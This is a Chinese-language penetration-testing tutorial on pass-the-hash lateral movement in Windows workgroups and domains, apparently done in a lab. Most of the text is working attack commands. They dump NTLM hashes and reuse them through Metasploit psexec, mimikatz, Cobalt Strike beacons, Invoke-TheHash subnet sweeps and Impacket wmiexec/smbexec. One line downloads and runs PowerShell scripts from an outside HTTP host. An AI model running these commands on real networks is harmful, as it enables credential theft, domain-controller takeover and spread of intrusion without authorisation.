域内横向移动

PTH简介

PASS THE Hash 也叫 Hash 传递攻击,简称 PTH。模拟用户登录不需要用户明文密码,就可以直接用获取到的 Hash 来登录目标系统。

利用成功的前提条件是:

  • 开启 445 端口 SMB 服务
  • 开启 admin$ 共享

Metasploit psexec模块

获取Hash

通过获取的Meterpreter会话执行hashdump得到用户hash值

1
meterpreter > hashdump

image-20231007220250146

1
2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

执行直接就获取到meterpreter的PTH模块:exploit/windows/smb/psexec

工作组

  • 添加路由
1
2
3
sessions 1
run autoroute -s 10.10.10.1/24
run autoroute -p

image-20231007220741908

  • 使用psexec模块

内网环境采用正向shell的payload,得到内网目标主机的shell会话

1
2
3
4
5
6
7
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.20
msf6 exploit(windows/smb/psexec) > set smbuser administrator
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set lport 51234
msf6 exploit(windows/smb/psexec) > run

image-20231007221131143

域环境

  • 获取域用户Hash值

image-20231007222133188

1
e318a05a844086852b42d47e60ee2b1c
1
2
3
4
5
6
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 10.10.10.10
msf5 exploit(windows/smb/psexec) > set smbdomain kc.local
msf5 exploit(windows/smb/psexec) > set smbuser lisi
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e318a05a844086852b42d47e60ee2b1c
msf5 exploit(windows/smb/psexec) > run

Mimikatz Hash传递攻击

当我们获得了内网中一台主机的NTLM哈希值,我们可以利用mimikatz对这个主机进行哈希传递攻击,执行命令成功后将会反弹回cmd

1
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.20 /ntlm:45a524862326cb9e7d85af4017a000f0" exit

在弹出的cmd中,我们还可以直接连接该主机,还可以查看目录文件等操作

1
2
3
4
net use \\10.10.10.20\c$
dir \\10.10.10.20\c$
copy 1.exe \\10.10.10.20\c$
net use h: \\10.10.10.20\c$

CobaltStrike Hash传递攻击

获取Hash

得到Beacon会话后,执行hashdump、logonpasswords 等命令即可得到当前主机用户Hash

image-20231007230816453

工作组

以上操作实际是在指定Beacon会话中执行如下命令:

1
2
3
4
5
6
7
8
9
10
rev2self
#还原token令牌

pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
#使用mimikatz执行PTH操作
#mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960"

jump psexec WEB 42585
#生成 windows/beacon_bind_tcp (0.0.0.0:42585) 对应的 payload (\\WEB\ADMIN$\403121c.exe),并上传到WEB主机
#在WEB主机通过 Service Control Manager 创建并启动服务 403121c 运行 payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
[01/30 01:38:21] beacon> rev2self
[01/30 01:38:21] [*] Tasked beacon to revert token
[01/30 01:38:21] beacon> pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
[01/30 01:38:21] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /
domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e >
\\.\pipe\2f6960" command
[01/30 01:38:21] beacon> jump psexec WEB 42585
[01/30 01:38:21] [*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:42585) on WEB
via Service Control Manager (\\WEB\ADMIN$\403121c.exe)
[01/30 01:38:23] [+] host called home, sent: 591778 bytes
[01/30 01:38:28] [+] Impersonated PC\Administrator
[01/30 01:38:28] [+] received output:
Started service 403121c on WEB
[01/30 01:38:28] [+] established link to child beacon: 10.10.10.20
[01/30 01:38:28] [+] receiv+ed output:
user : Administrator
domain : PC
program : C:\Windows\system32\cmd.exe /c echo 55d23cd5b3e > \\.\pipe\2f6960
impers. : no
NTLM : 45a524862326cb9e7d85af4017a000f0
| PID 1824
| TID 4024
| LSA Process is now R/W
| LUID 0 ; 55498536 (00000000:034ed728)
\_ msv1_0 - data copy @ 00000000018EFED0 : OK !
\_ kerberos -

域环境

  • 获取域用户Hash

image-20231007233509226

得到kc域内lisi用户ntlm hash ,发现是域管理员用户:

image-20231007234650738

  • 使用psexec得到域控Beacon会话

通过执行net view定位 DC 的IP地址:10.10.10.10

image-20231007232329043

image-20231007232433880

Powershell Hash传递攻击

使用已知管理员Hash,批量撞指定网段机器,此方式同时适用于工作组和域环境。

需要同时加载Invoke-WMIExec.ps1Invoke-TheHash.ps1

https://github.com/Kevin-Robertson/Invoke-TheHash

  • 加载脚本
1
2
3
4
powershell -exec bypass

Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1
1
2
3
4
powershell -exec bypass

IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');
1
Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash 579110c49145015c47ecd267657d3174
  • 利用已有管理员hash,批量撞指定网段机器
1
2
3
4
5
工作组:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4

域:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 10.10.10.0/24 -Domain kc -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10

Impacket Hash传递攻击

1
2
3
4
5
命令执行:
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20 "whoami"

得到shell:
smbexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20